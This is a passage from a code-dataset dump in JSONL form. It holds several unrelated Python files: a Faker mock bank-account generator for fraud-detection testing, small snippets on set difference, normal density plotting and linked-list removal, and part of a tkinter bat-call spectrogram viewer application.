80)\n\tinput()\n","repo_name":"flappix/raspberry-looper","sub_path":"jack_midi_test.py","file_name":"jack_midi_test.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"738638244","text":"import json\nfrom faker import Faker\nfrom faker.providers import phone_number\nimport pandas as pd\nfrom argparse import ArgumentParser\n\n\nclass AccountProfileMockGenerator:\n def __init__(self):\n self.fake = Faker(locale=\"en_IN\")\n self.fake.add_provider(phone_number)\n self.index = 0\n self.occurance_ratio = 0\n self.active_account_prob = 80\n self.event_count = 1\n self.bank_codes = [\n \"ANDB\",\n \"ARBN\",\n \"BARB\",\n \"BOIN\",\n \"CBIN\",\n \"CNRB\",\n \"CORP\",\n \"FBIN\",\n \"HDFC\",\n \"IDFB\",\n \"INRB\",\n \"ISBK\",\n \"KKBK\",\n \"KVCB\",\n \"SBHY\",\n \"SBIN\",\n \"SIBL\",\n \"UCBS\",\n \"UTIB\",\n \"SYNB\"\n ]\n self.account_type_enum=[\"CURRENT\", \"SAVINGS\"]\n self.account_status_enum=[\"ON_HOLD\", \"SUSPENDED\", \"CLOSED\"]\n \n def generate_name_ifsc_combination(self):\n ifsc = self.fake.bothify(text=\"?\", letters=self.bank_codes) + self.fake.bothify(\n text=\"0######\"\n )\n name = self.fake.name()\n accno = self.fake.bothify(text=\"###############\")\n return name, ifsc, accno\n\n def generate_events(self, event_count):\n self.event_count = event_count\n events = []\n event_count = int(event_count)\n for i in range(event_count):\n self.index = i\n self.occurance_ratio = (i / event_count) * 100\n events.append(self.generate_event())\n return events\n\n def get_account_status(self):\n if self.active_account_prob > self.occurance_ratio:\n return \"ACTIVE\"\n else:\n return self.fake.bothify(\n text=\"?\", letters=self.account_status_enum\n )\n\n def generate_event(self):\n account_name, ifsc_code, account_number = self.generate_name_ifsc_combination()\n event = {\n \"account_name\": account_name,\n \"ifsc_code\": ifsc_code,\n \"account_number\": account_number,\n \"account_type\": self.fake.bothify(text=\"?\", letters=self.account_type_enum),\n \"account_status\": self.get_account_status(),\n }\n return event\n\ndef write_events_to_output(events):\n df = pd.DataFrame(events)\n df.to_json(\"../sample-files/account_profile.json\", lines=True, orient=\"records\")\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\"Mock Data Generator\")\n parser.add_argument(\n \"-n\", \"--event_count\", type=int, default=1, help=\"Specify the number of events\"\n )\n args = parser.parse_args()\n event_generator = AccountProfileMockGenerator()\n events = event_generator.generate_events(args.event_count)\n write_events_to_output(events)\n","repo_name":"Sanketika-Obsrv/obsrv-adhoc-scripts","sub_path":"fraud_detection/mock-data-generator/src/account_profile.py","file_name":"account_profile.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10870754497","text":"#!/usr/bin/python3\n\n'''\nthe following finds the difference between two iterables by keeping only the\nvalues that are in the firts one.\n'''\n\ndef difference(a, b):\n set_a = set(a)\n set_b = set(b)\n comparison = set_a.difference(set_b)\n print(comparison)\n return list(comparison)\n\nif __name__ == \"__main__\":\n a = [1,2,3,4]\n b = [1,2,3,]\n\n assert difference(a,b) == [4]\n \n","repo_name":"readingwritingcode/pythonSnipets","sub_path":"snipets/difference.py","file_name":"difference.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9005425","text":"#density fn can have values larger than 1\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nmeanval=0.0\nsdval=0.2\nxlow= meanval-3*sdval\nxhigh= meanval+3*sdval\ndx=0.002 #interval width\n#specify points between low and high points\n# We can use np.arange() to create an array of values starting from the start value\n# and incrementally going up to end value by incrementing up by the step value.\n# step is by default set to 1. It is very similar to np.linspace as both output arrays\n# which start and stop at given values and with a certain number of values in the array, or rather,\n# with a step size that gets us from the start to the end.\nx = np.arange(xlow, xhigh, dx)\n# Compute y values, i.e., probability density at each value of x:\n#y is also array of values\ny=(1/(sdval*np.sqrt(2*np.pi)))*np.exp(-0.5*((x-meanval)/sdval)**2)\nplt.plot(x,y)\n# A stem plot plots vertical lines (using linefmt) at each x location from the baseline to y,\n# and places a marker there using markerfmt.\n# A horizontal line at 0 is plotted using basefmt.\nplt.stem(x, y, markerfmt=' ')\nprint('hi')\nplt.xlabel('$x$')\nplt.ylabel('$p(x)$')\nplt.title('Normal Probability Density')\n# Approximate the integral as the sum of width * height for each interval.\narea = np.sum(dx*y)\n# print(area)\n# Display info in the graph.\nplt.text(-.6, 1.7, '$\\mu$ = %s' % meanval)\nplt.text(-.6, 1.5, '$\\sigma$ = %s' % sdval)\nplt.text(.2, 1.7, '$\\Delta x$ = %s' % dx)\nplt.text(.2, 1.5, '$\\sum_{x}$ $\\Delta x$ $p(x)$ = %5.3f' % area)\nplt.show()\nplt.savefig('normal.3.png')\n","repo_name":"aseempahuja/MarketingModels2","sub_path":"Ex_integral_of_density.py","file_name":"Ex_integral_of_density.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9913254557","text":"from common import ListNode\n\n\nclass Solution:\n def removeElements(self, head: ListNode, val: int) -> ListNode:\n dummy = ListNode(next=head)\n prev = dummy\n while head:\n if head.val != val:\n prev.next = head\n prev = prev.next\n head = head.next\n return dummy.next\n\n\nif __name__ == \"__main__\":\n next = ListNode()\n next.val = 1\n head = None\n for v in [2, 2, 1]:\n head = ListNode()\n head.val = v\n head.next = next\n next = head\n\n res = Solution().removeElements(head, 2)\n pass\n","repo_name":"Pravuk/leetcode_practice","sub_path":"remove_linked_list_elements.py","file_name":"remove_linked_list_elements.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69968684392","text":"import sys\nimport tkinter as tk\nimport tkinter.filedialog\nimport tkinter.messagebox\n\nfrom itertools import chain\nfrom timeit import default_timer as timer\nfrom typing import NamedTuple, Optional, Tuple\nfrom . import audiofileservice as af, appsettings, colourmap\nfrom .amplitudegraphframe import AmplitudeGraphFrame\nfrom .appsettings import COLOUR_MAPS\nfrom .appsettingsmodal import AppSettingsWindow\nfrom .audiofileservice import AudioFileService\nfrom .breadcrumbservice import BreadcrumbService, Breadcrumb\nfrom .buttonframe import ButtonFrame\nfrom .common import AxisRange\nfrom .constants import *\nfrom .fileinfoframe import FileInfoFrame\nfrom .frames import DrawableFrame\nfrom .graphsettings import GraphSettings\nfrom .historianservice import HistorianService\nfrom .rendering import SpectrogramPipeline, SpectrogramFftStep, \\\n AmplitudePipeline, ProfilePipeline, GraphParams, SpectrogramDataReaderStep\nfrom .profilegraphframe import ProfileGraphFrame\nfrom .readoutframe import ReadoutFrame, SettingsButton\nfrom .moreframe import MoreTopFrame\nfrom .spectrogramgraphframe import SpectrogramGraphFrame\nfrom .wavfileparser import WavFileError\nfrom .about import AboutWindow\nfrom . import get_asset_path\n\n# One day, we will define the menus using a table including shortcuts and underlined letters:\nMENU_TEXT_FILE = \"File\"\nMENU_TEXT_ABOUT = \"About\"\nMENU_TEXT_SETTINGS = \"Settings\"\nMENU_TEXT_OPEN_MAIN = \"Open\"\nMENU_TEXT_OPEN_RECENT_MAIN = \"Open recent\"\nMENU_TEXT_OPEN_REF = \"Open reference\"\nMENU_TEXT_OPEN_RECENT_REF = \"Open recent as reference\"\nMENU_TEXT_CLOSE_MAIN = \"Close\"\nMENU_TEXT_CLOSE_REF = \"Close reference\"\n# MENU_TEXT_SAVE = \"Save\"\nMENU_TEXT_EXIT = \"Exit\"\n\nprogram_directory = sys.path[0]\n\n\nclass SettingsButtonsController:\n \"\"\"\n Encapsulate the bit of logic relating to showing and hiding the settings frames in response\n the more/less buttons being pressed.\n \"\"\"\n _NONE = 0\n _MAIN = 1\n _REF = 2\n\n def __init__(self, parent: tk.Frame, main_settings_button: SettingsButton, main_settings_frame: tk.Frame,\n ref_settings_button: SettingsButton, ref_settings_frame: tk.Frame):\n self._parent = parent\n self._state: int = self._NONE\n self._main_settings_button: SettingsButton = main_settings_button\n self._ref_settings_button: SettingsButton = ref_settings_button\n self._main_settings_frame = main_settings_frame\n self._ref_settings_frame = ref_settings_frame\n\n self._main_settings_button.configure(command=self.on_main_settings)\n self._ref_settings_button.configure(command=self.on_ref_settings)\n\n self.on_reset()\n\n def on_reset(self):\n self._state = self._NONE\n self._do_update()\n\n def on_main_settings(self):\n if self._state == self._MAIN:\n self._state = self._NONE\n else:\n self._state = self._MAIN\n self._do_update()\n\n def on_ref_settings(self):\n if self._state == self._REF:\n self._state = self._NONE\n else:\n self._state = self._REF\n self._do_update()\n\n def _do_update(self):\n if self._state == self._MAIN:\n self._main_settings_button.update_button_appearance(True, False)\n self._ref_settings_button.update_button_appearance(False, True)\n self._main_settings_frame.grid()\n self._ref_settings_frame.grid_remove()\n elif self._state == self._REF:\n self._main_settings_button.update_button_appearance(False, True)\n self._ref_settings_button.update_button_appearance(True, False)\n self._main_settings_frame.grid_remove()\n self._ref_settings_frame.grid()\n else:\n self._main_settings_button.update_button_appearance(False, False)\n self._ref_settings_button.update_button_appearance(False, False)\n self._main_settings_frame.grid_remove()\n self._ref_settings_frame.grid_remove()\n\n # We have to tell the parent frame to reduce size, it doesn't do this\n # automatically when we remove the settings frames sadly:\n self._parent.configure(height=0, width=100) # Width has to be non zero for some reason.\n\n\nclass GraphPipelines(NamedTuple):\n \"\"\"A tuple of rendering pipelines relating to a set of graphs.\"\"\"\n amplitude: Optional[AmplitudePipeline]\n spectrogram: Optional[SpectrogramPipeline]\n profile: Optional[ProfilePipeline]\n\n\nclass PanelFrame(tk.Frame):\n \"\"\"This is a Frame which contains the set of graphs relating to the main or the reference data.\"\"\"\n\n def __init__(self, parent, root, pipelines: GraphPipelines, data_context, settings, settings_frame, pad, is_reference):\n super().__init__(parent)\n\n self._pipelines = pipelines\n self._dc = data_context\n self._settings = settings\n self._settings_frame = settings_frame\n\n col = 0\n self._fileinfo_frame = FileInfoFrame(self, self._dc)\n self._fileinfo_frame.grid(row=0, column=col, columnspan=3, pady=(pad, 0), sticky='ew', padx=pad)\n\n self._button_frame = ButtonFrame(self, self._dc.breadcrumb_service, self, self._dc, program_directory,\n is_reference)\n self._button_frame.grid(row=1, column=col, columnspan=3, pady=(0, 0), sticky='we', padx=pad)\n initial_cursor_mode = self._button_frame.get_cursor_mode()\n\n self._amplitude_frame = AmplitudeGraphFrame(self, root, pipelines.amplitude, self._dc, self._settings,\n is_reference=is_reference)\n self._amplitude_frame.grid(row=2, column=col, sticky='nesw', padx=pad)\n\n self._spectrogram_frame = SpectrogramGraphFrame(self, root, pipelines.spectrogram, self._dc, self._settings,\n initial_cursor_mode, is_reference=is_reference)\n self._spectrogram_frame.grid(row=3, column=col, sticky='nesw', padx=pad)\n\n # Set up two-way communications between the scroll bar and the graph frame.\n # Set repeatdelay=0 to disable repeating, which behaves oddly.\n self._time_scroller = tk.Scrollbar(self, orient='horizontal', jump=True, repeatdelay=0)\n self._spectrogram_frame.set_scroller_t(self._time_scroller)\n self._time_scroller.grid(row=4, column=col, sticky=\"ew\", padx=pad)\n\n self._readout_frame = ReadoutFrame(self)\n self._readout_frame.grid(row=6, column=col, pady=pad, sticky='we')\n\n col = 1\n self._profile_frame = ProfileGraphFrame(self, root, pipelines.profile, self._dc, self._settings, is_reference=is_reference)\n self._profile_frame.grid(row=3, column=col, sticky='ns')\n\n col = 2\n frequency_scroller = tk.Scrollbar(self, orient='vertical', jump=True, repeatdelay=0)\n frequency_scroller.grid(row=3, column=col, sticky=\"ns\")\n self._spectrogram_frame.set_scroller_f(frequency_scroller)\n\n self.rowconfigure(0, weight=0)\n self.rowconfigure(1, weight=0)\n self.rowconfigure(2, weight=0)\n self.rowconfigure(3, weight=1)\n self.rowconfigure(4, weight=0)\n self.columnconfigure(0, weight=1)\n self.columnconfigure(1, weight=0)\n self.columnconfigure(2, weight=0)\n\n # The profile is initially absent, to avoid an annoying flicker on startup:\n self._profile_frame.grid_remove()\n\n # Tell the spectrogram framehow it can control its histogram:\n self._spectrogram_frame.set_histogram_interface(self._settings_frame.get_histogram_interface())\n\n self._frames = [self._amplitude_frame, self._spectrogram_frame, self._profile_frame,\n self._button_frame, self._fileinfo_frame, self._readout_frame]\n\n def get_settings_button(self) -> SettingsButton:\n return self._readout_frame.get_settings_button()\n\n def on_user_applied_settings(self, draw_scope: int):\n \"\"\"The user change the settings - refresh the display accordingly.\"\"\"\n self.on_rescale_handler(self._settings.time_range, self._settings.frequency_range, draw_scope=draw_scope)\n\n def update_readout_coords(self, p_axis, p_data_area):\n # Use the data area coordinates to get a data value (power) from the pipeline's\n # zoomed data, which maps to data area pixels:\n power = None\n if p_data_area:\n power = self._pipelines.spectrogram.data_area_to_value(p_data_area)\n self._readout_frame.update_readout_coords(p_axis, power)\n\n def update_readout_params(self, params: GraphParams):\n self._readout_frame.update_graph_parameters(params)\n\n def on_rescale_handler(self, time_range: AxisRange, frequency_range: AxisRange,\n add_breadcrumb=True, draw_scope: int = DrawableFrame.DRAW_ALL):\n \"\"\"Do a graph rescale triggered from the UI.\"\"\"\n\n # Clip the requested ranges to the limits from the data file:\n af_data = self._dc.get_afs_data()\n if af_data:\n time_range = self._clip_to_file_data_range(time_range, af_data.time_range, self._dc.time_range)\n frequency_range = self._clip_to_file_data_range(frequency_range, af_data.frequency_range,\n self._dc.frequency_range)\n\n self._dc.time_range, self._dc.frequency_range = time_range, frequency_range\n if add_breadcrumb:\n self._dc.push_breadcrumb()\n\n self.draw(draw_scope)\n\n def on_scroll_handler(self, delta_t: float, delta_f: float,\n range_t: AxisRange, range_f: AxisRange, add_breadcrumb=True):\n \"\"\"\n Scroll time and/or frequency in response to the UI, maintaining the range, and limiting\n to the range of available data. The deltas must be less than the current axis ranges.\n \"\"\"\n\n # Limit the the deltas to the range of the available data, maintaining the span of each axis,\n # and assuming (1) the existing range is valid (2) the deltas are less than the current axis ranges.\n af_data = self._dc.get_afs_data()\n if af_data:\n time_min, time_max = af_data.time_range.get_tuple()\n if delta_t > 0:\n if range_t.max + delta_t > time_max:\n delta_t = time_max - range_t.max\n else:\n if range_t.min + delta_t < time_min:\n delta_t = -(range_t.min - time_min)\n\n freq_min, freq_max = af_data.frequency_range.get_tuple()\n if delta_f > 0:\n if range_f.max + delta_f > freq_max:\n delta_f = freq_max - range_f.max\n else:\n if range_f.min + delta_f < freq_min:\n delta_f = -(range_f.min - freq_min)\n\n limited_range_t = AxisRange(range_t.min + delta_t, range_t.max + delta_t)\n limited_range_f = AxisRange(range_f.min + delta_f, range_f.max + delta_f)\n\n self.on_rescale_handler(limited_range_t, limited_range_f,\n add_breadcrumb=add_breadcrumb,\n draw_scope=DrawableFrame.DRAW_ALL)\n\n def draw(self, draw_scope: int = DrawableFrame.DRAW_ALL):\n # Update the settings to match the *actual* new axis ranges:\n self._settings.time_range = self._dc.time_range\n self._settings.frequency_range = self._dc.frequency_range\n self._settings.on_app_modified_settings()\n\n # Show or hide the profile graph as required:\n if self._settings.show_profile:\n self._profile_frame.grid()\n else:\n self._profile_frame.grid_remove()\n\n # Tell each frame to redraw themselves:\n for f in self._frames:\n if f:\n f.reset_draw(draw_scope)\n for f in self._frames:\n if f:\n f.draw(draw_scope)\n\n @staticmethod\n def _clip_to_file_data_range(r_in: AxisRange, r_permitted, r_default):\n in_min, in_max = r_in.get_tuple()\n permitted_min, permitted_max = r_permitted.get_tuple()\n out_min = max(in_min, permitted_min)\n out_max = min(in_max, permitted_max)\n # sanity:\n if out_min >= out_max:\n out_min, out_max = r_default\n return AxisRange(out_min, out_max)\n\n def on_home_button(self):\n # We add an initial breadcrumb for home.\n myaf = self._dc.afs\n if myaf:\n # If there is a file, home takes us to the file limits:\n fdata = myaf.get_rendering_data()\n self.on_rescale_handler(fdata.time_range, fdata.frequency_range, add_breadcrumb=True)\n else:\n # Otherwise, home to the default ranges.\n self.on_rescale_handler(DataContext.DEFAULT_TIME_RANGE, DataContext.DEFAULT_FREQUENCY_RANGE,\n add_breadcrumb=True)\n\n def on_navigation_button(self, breadcrumb: Breadcrumb):\n self._dc.time_range = breadcrumb.time_range\n self._dc.frequency_range = breadcrumb.frequency_range\n # Don't add a breadcrumb when we navigate based on breadcrumbs:\n self.on_rescale_handler(breadcrumb.time_range, breadcrumb.frequency_range, add_breadcrumb=False)\n\n def on_cursor_mode(self, mode):\n self._spectrogram_frame.set_cursor_mode(mode)\n\n def set_sync_source(self, sync_source):\n \"\"\"Notify this panel that there is a sync source it can use, or None if\n there isn't\"\"\"\n return self._button_frame.set_sync_source(sync_source)\n\n def get_sync_data(self):\n \"\"\"This panel is being requests for sync data\"\"\"\n return self._dc.time_range, self._dc.frequency_range, self._spectrogram_frame.get_canvas_size()\n\n def apply_sync_data(self, sync_data):\n \"\"\"Sync the ranges of this panel to those supplied.\"\"\"\n time_range, frequency_range, other_canvas_size = sync_data\n this_canvas_width, _ = self._spectrogram_frame.get_canvas_size()\n other_canvas_width, _ = other_canvas_size\n\n # Apply the frequency range directly, and centre the time range on the current\n # time range's centre:\n t1, t2 = self._dc.time_range.get_tuple()\n new_t1, new_t2 = time_range.get_tuple()\n existing_centre = (t1 + t2) / 2\n new_half_span = (new_t2 - new_t1) / 2\n # Scale the half span by ratio of canvas widths so the on-screen scaling is the same:\n new_half_span *= this_canvas_width / other_canvas_width\n centred_time_range = AxisRange(existing_centre - new_half_span, existing_centre + new_half_span)\n self.on_rescale_handler(centred_time_range, frequency_range, add_breadcrumb=True)\n\n def get_screen_factors(self) -> Tuple[float, float]:\n # Calculate the screen aspect factor based on the spectrogram graph,\n # that will be used in adaptive window length calculations.\n return self._spectrogram_frame.calculate_screen_factors()\n\n def on_left_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, -1, tk.UNITS)\n\n def on_shift_left_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, -1, tk.PAGES)\n\n def on_right_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, 1, tk.UNITS)\n\n def on_shift_right_key(self, event):\n self._spectrogram_frame.tview(tk.SCROLL, 1, tk.PAGES)\n\n def on_up_key(self, event):\n self._spectrogram_frame.set_preset_time_range(-1)\n\n def on_shift_up_key(self, event):\n pass\n\n def on_down_key(self, event):\n self._spectrogram_frame.set_preset_time_range(+1)\n\n def on_shift_down_key(self, event):\n pass\n\n def on_page_up_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, -1, tk.UNITS)\n\n def on_shift_page_up_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, -1, tk.PAGES)\n\n def on_page_down_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, 1, tk.UNITS)\n\n def on_shift_page_down_key(self, event):\n self._spectrogram_frame.fview(tk.SCROLL, 1, tk.PAGES)\n\n def on_home_key(self, event):\n self.on_home_button()\n\n\nclass DataContext:\n \"\"\"This class contains data used by a graph pane, including raw file data and axis ranges.\"\"\"\n\n DEFAULT_TIME_RANGE = AxisRange(rmin=0, rmax=30)\n DEFAULT_FREQUENCY_RANGE = AxisRange(rmin=0, rmax=192000)\n DEFAULT_AMPLITUDE_RANGE = AxisRange(rmin=-1, rmax=1)\n\n def __init__(self):\n self.afs: Optional[AudioFileService] = None\n self.breadcrumb_service = BreadcrumbService()\n self.time_range: Optional[AxisRange] = None\n self.frequency_range: Optional[AxisRange] = None\n self.amplitude_range: Optional[AxisRange] = None\n self.reset()\n\n def reset(self):\n self._set_afs(None)\n self.time_range = self.DEFAULT_TIME_RANGE\n self.frequency_range = self.DEFAULT_FREQUENCY_RANGE\n self.amplitude_range = self.DEFAULT_AMPLITUDE_RANGE\n\n def _set_afs(self, afs: Optional[AudioFileService]):\n # If we already have an afs, close it:\n if self.afs is not None:\n self.afs.close()\n self.afs = afs\n\n def get_ranges(self):\n return self.time_range, self.frequency_range, self.amplitude_range\n\n def get_afs(self) -> Optional[AudioFileService]:\n return self.afs\n\n def get_afs_data(self) -> Optional[AudioFileService.RenderingData]:\n return self.afs.get_rendering_data() if self.afs is not None else None\n\n def update_from_af(self, afs: AudioFileService):\n self._set_afs(afs)\n af_data = afs.get_rendering_data()\n self.amplitude_range = af_data.amplitude_range\n self.time_range = af_data.time_range\n self.frequency_range = af_data.frequency_range\n\n def push_breadcrumb(self):\n self.breadcrumb_service.push_entry(\n Breadcrumb(time_range=self.time_range, frequency_range=self.frequency_range, timestamp=timer()))\n\n def on_data_change(self):\n self.breadcrumb_service.reset()\n self.push_breadcrumb()\n\n\nclass RootWindow(tk.Tk):\n \"\"\"The top level application window.\"\"\"\n\n def __init__(self, *args, initialfile=None, **kwargs):\n super().__init__(*args, **kwargs)\n\n self._paned_window: tk.PanedWindow\n\n self._main_pipelines = GraphPipelines(None, None, None)\n self._dc_main: DataContext = DataContext()\n self._main_historian = HistorianService()\n self._main_settings = GraphSettings(self._on_app_modified_main_settings, self.on_user_applied_main_settings)\n self._main_settings.show_profile = True\n\n self._ref_pipelines = GraphPipelines(None, None, None)\n self._dc_ref: DataContext = DataContext()\n self._ref_historian = HistorianService()\n self._ref_settings = GraphSettings(self._on_app_modified_ref_settings, self.on_user_applied_ref_settings)\n self._ref_settings.show_profile = False\n\n self._menu_recent_main = None\n self._menu_recent_ref = None\n self._menu_analysis = None\n self._menu_image = None\n self._menu_edit = None\n self._menu_file = None\n self._first_file_open = True # Track whether this is the first time the user has opened a file.\n\n appsettings.instance.read()\n self._apply_settings()\n\n # Keep track of what cursors have been set:\n self._cursor_stack = []\n self._push_cursor()\n\n self.title(PROGRAM_NAME)\n\n # Define the initial window position and size:\n self.geometry(\"900x700+100+100\")\n self.iconphoto(True, tk.PhotoImage(file=get_asset_path(\"batogram.png\")))\n\n self.protocol(\"WM_DELETE_WINDOW\", self.exit)\n\n # Kick off all the rendering pipelines:\n self._start_pipelines()\n\n self._create_menus()\n self._create_widgets()\n\n self.bind(DATA_CHANGE_MAIN_EVENT, self._on_data_change_main)\n self.bind(DATA_CHANGE_REF_EVENT, self._on_data_change_ref)\n\n self.bind('', self._main_pane.on_left_key)\n self.bind('', self._main_pane.on_shift_left_key)\n self.bind('', self._main_pane.on_right_key)\n self.bind('', self._main_pane.on_shift_right_key)\n self.bind('', self._main_pane.on_up_key)\n self.bind('', self._main_pane.on_shift_up_key)\n self.bind('', self._main_pane.on_down_key)\n self.bind('', self._main_pane.on_shift_down_key)\n self.bind('', self._main_pane.on_page_up_key)\n self.bind('', self._main_pane.on_shift_page_up_key)\n self.bind('', self._main_pane.on_page_down_key)\n self.bind('', self._main_pane.on_shift_page_down_key)\n self.bind('', self._main_pane.on_home_key)\n\n # Allow tk to work out the size of things before we try to draw any graphs:\n self.update_idletasks()\n\n self._main_pane.draw()\n self._ref_pane.draw()\n\n if initialfile is not None:\n self.after_idle(lambda: self._do_open_main_file(initialfile))\n\n def _start_pipelines(self):\n # Kick off the spectrogram rendering pipelines. This has to done at this level because\n # the pipelines share some steps for effiency, to avoid repeated expensive calculations.\n main_spectrogram_step = SpectrogramFftStep(self._main_settings)\n main_data_reader_step = SpectrogramDataReaderStep(self._main_settings)\n self._main_pipelines = GraphPipelines(\n AmplitudePipeline(self._main_settings, main_data_reader_step),\n SpectrogramPipeline(self._main_settings, main_spectrogram_step, main_data_reader_step),\n ProfilePipeline(self._main_settings, main_spectrogram_step, main_data_reader_step))\n\n ref_spectrogram_step = SpectrogramFftStep(self._ref_settings)\n ref_data_reader_step = SpectrogramDataReaderStep(self._ref_settings)\n self._ref_pipelines = GraphPipelines(\n AmplitudePipeline(self._ref_settings, ref_data_reader_step),\n SpectrogramPipeline(self._ref_settings, ref_spectrogram_step, ref_data_reader_step),\n ProfilePipeline(self._ref_settings, ref_spectrogram_step, ref_data_reader_step))\n\n def _create_widgets(self):\n pad = 5\n self._paned_window = tk.PanedWindow(self, orient=tk.HORIZONTAL, showhandle=True, sashcursor=\"sb_h_double_arrow\",\n sashrelief=tk.GROOVE)\n\n bottom = self._create_bottom_panel(self, pad)\n bottom.grid(row=1, column=0)\n\n # Create the settings frames first so they can be passed as parameters\n # to other frames below:\n\n self._ref_pane = PanelFrame(\n self._paned_window, self, self._ref_pipelines, self._dc_ref, self._ref_settings,\n self._ref_settings_frame, pad, is_reference=True)\n self._ref_pane.pack(side=tk.LEFT)\n\n self._main_pane = PanelFrame(\n self._paned_window, self, self._main_pipelines, self._dc_main, self._main_settings,\n self._main_settings_frame, pad, is_reference=False)\n self._main_pane.pack(side=tk.RIGHT)\n\n SettingsButtonsController(bottom,\n self._main_pane.get_settings_button(), self._main_settings_frame,\n self._ref_pane.get_settings_button(), self._ref_settings_frame)\n\n # Assemble the panel window:\n self._paned_window.add(self._ref_pane)\n self._paned_window.add(self._main_pane)\n self._paned_window.grid(row=0, column=0, sticky=\"nsew\")\n\n self.rowconfigure(0, weight=1)\n self.rowconfigure(1, weight=0)\n self.columnconfigure(0, weight=1)\n\n # This code annoyingly jumps on startup. I can't find simple way to avoid that right now.\n # Maybe we should make the frame invisible? I don't know if that would work.\n self.update() # Need to do this before we can place the sash.\n sash_pixels = 0\n self._paned_window.sash_place(0, sash_pixels, 0)\n\n def _create_bottom_panel(self, parent, pad):\n\n frame = tk.Frame(parent)\n self._ref_settings_frame = MoreTopFrame(frame, self._ref_settings, pad)\n self._ref_settings_frame.grid(row=0, column=0)\n self._main_settings_frame = MoreTopFrame(frame, self._main_settings, pad)\n self._main_settings_frame.grid(row=1, column=0)\n\n return frame\n\n def _create_menus(self):\n # Set up the menus (see https://tkdocs.com/tutorial/menus.html):\n self.option_add('*tearOff', False)\n menubar = tk.Menu(self)\n self['menu'] = menubar\n\n self._menu_file = tk.Menu(menubar)\n menubar.add_cascade(menu=self._menu_file, label=MENU_TEXT_FILE, underline=0)\n self._menu_file.add_command(label=MENU_TEXT_OPEN_MAIN, command=self._open_main_file, underline=0)\n self._menu_file.entryconfigure(MENU_TEXT_OPEN_MAIN, accelerator='Ctrl+O')\n self.bind(\"\", self._open_main_file_event)\n self._menu_recent_main = tk.Menu(self._menu_file)\n self._menu_file.add_cascade(menu=self._menu_recent_main, label=MENU_TEXT_OPEN_RECENT_MAIN)\n self._populate_file_history(self._menu_recent_main, self._main_historian, self._do_open_main_file)\n self._menu_file.add_command(label=MENU_TEXT_CLOSE_MAIN, command=self._close_main_file_event, underline=0)\n self._menu_file.add_separator()\n\n self._menu_file.add_command(label=MENU_TEXT_OPEN_REF, command=self._open_ref_file, underline=5)\n self._menu_file.entryconfigure(MENU_TEXT_OPEN_REF, accelerator='Ctrl+R')\n self.bind(\"\", self._open_ref_file_event)\n self._menu_recent_ref = tk.Menu(self._menu_file)\n self._menu_file.add_cascade(menu=self._menu_recent_ref, label=MENU_TEXT_OPEN_RECENT_REF)\n self._populate_file_history(self._menu_recent_ref, self._ref_historian, self._do_open_ref_file)\n self._menu_file.add_command(label=MENU_TEXT_CLOSE_REF, command=self.close_ref_file_event)\n self._menu_file.add_separator()\n\n # self._menu_file.add_command(label=MENU_TEXT_SAVE, command=self.save_files_as)\n # self._menu_file.add_separator()\n self._menu_file.add_command(label=MENU_TEXT_EXIT, command=self.exit, underline=1)\n self._menu_file.entryconfigure(MENU_TEXT_EXIT, accelerator='Ctrl+X')\n self.bind(\"\", self.exit_event)\n\n menubar.add_command(label=MENU_TEXT_SETTINGS, command=self._show_settings, underline=0)\n\n menubar.add_command(label=MENU_TEXT_ABOUT, command=self._show_about)\n\n self.enable_menu_items()\n\n @staticmethod\n def _populate_file_history(parent_menu_item, historian, method):\n parent_menu_item.delete(0, \"end\")\n for basename, file_path in historian.get_history():\n parent_menu_item.add_command(label=basename,\n command=lambda f=file_path: method(f))\n\n def enable_menu_items(self):\n # self._menu_file.entryconfigure(MENU_TEXT_SAVE, state=tk.DISABLED)\n self._menu_file.entryconfigure(MENU_TEXT_OPEN_RECENT_MAIN,\n state=tk.DISABLED if self._main_historian.is_empty() else tk.NORMAL)\n self._menu_file.entryconfigure(MENU_TEXT_OPEN_RECENT_REF,\n state=tk.DISABLED if self._ref_historian.is_empty() else tk.NORMAL)\n\n def _pop_cursor(self):\n try:\n self._cursor_stack.pop()\n cursor_name = self._cursor_stack[-1]\n except IndexError as e:\n print(\"Warning - couldn't pop the cursor: {}\".format(e))\n self.config(cursor=\"\")\n else:\n self.config(cursor=cursor_name)\n\n def _push_cursor(self, cursor_name=\"\"):\n self._cursor_stack.append(cursor_name)\n self.config(cursor=cursor_name)\n self.update()\n\n filetypes = (\n ('audio files', '*.wav *.WAV'),\n ('All files', '*.*')\n )\n\n def _open_main_file_event(self, _):\n self._open_main_file()\n\n def _open_file_dialog(self, title: str) -> str:\n initialdir = None\n if self._first_file_open:\n self._first_file_open = False\n # Only do this the first time a file is opened; thereafter, the dialog\n # remembers where the user last navigated it to:\n initialdir = appsettings.instance.data_directory\n\n filepath: str = tk.filedialog.askopenfilename(title=title, filetypes=self.filetypes,\n initialdir=initialdir)\n return filepath\n\n def _open_main_file(self):\n filepath = self._open_file_dialog(\"Open an audio file\")\n if filepath:\n self._do_open_main_file(filepath)\n\n def _open_ref_file_event(self, _):\n self._open_ref_file()\n\n def _open_ref_file(self):\n filepath = self._open_file_dialog(\"Open a reference audio file\")\n if filepath:\n self._do_open_ref_file(filepath)\n\n def _do_open_main_file(self, filepath):\n myaf = self._do_open_file(filepath, self._menu_recent_main, self._do_open_main_file, self._main_historian)\n if myaf is not None:\n self._dc_main.update_from_af(myaf)\n self._main_settings_frame.copy_settings_to_widgets() # The axis ranges have changed\n 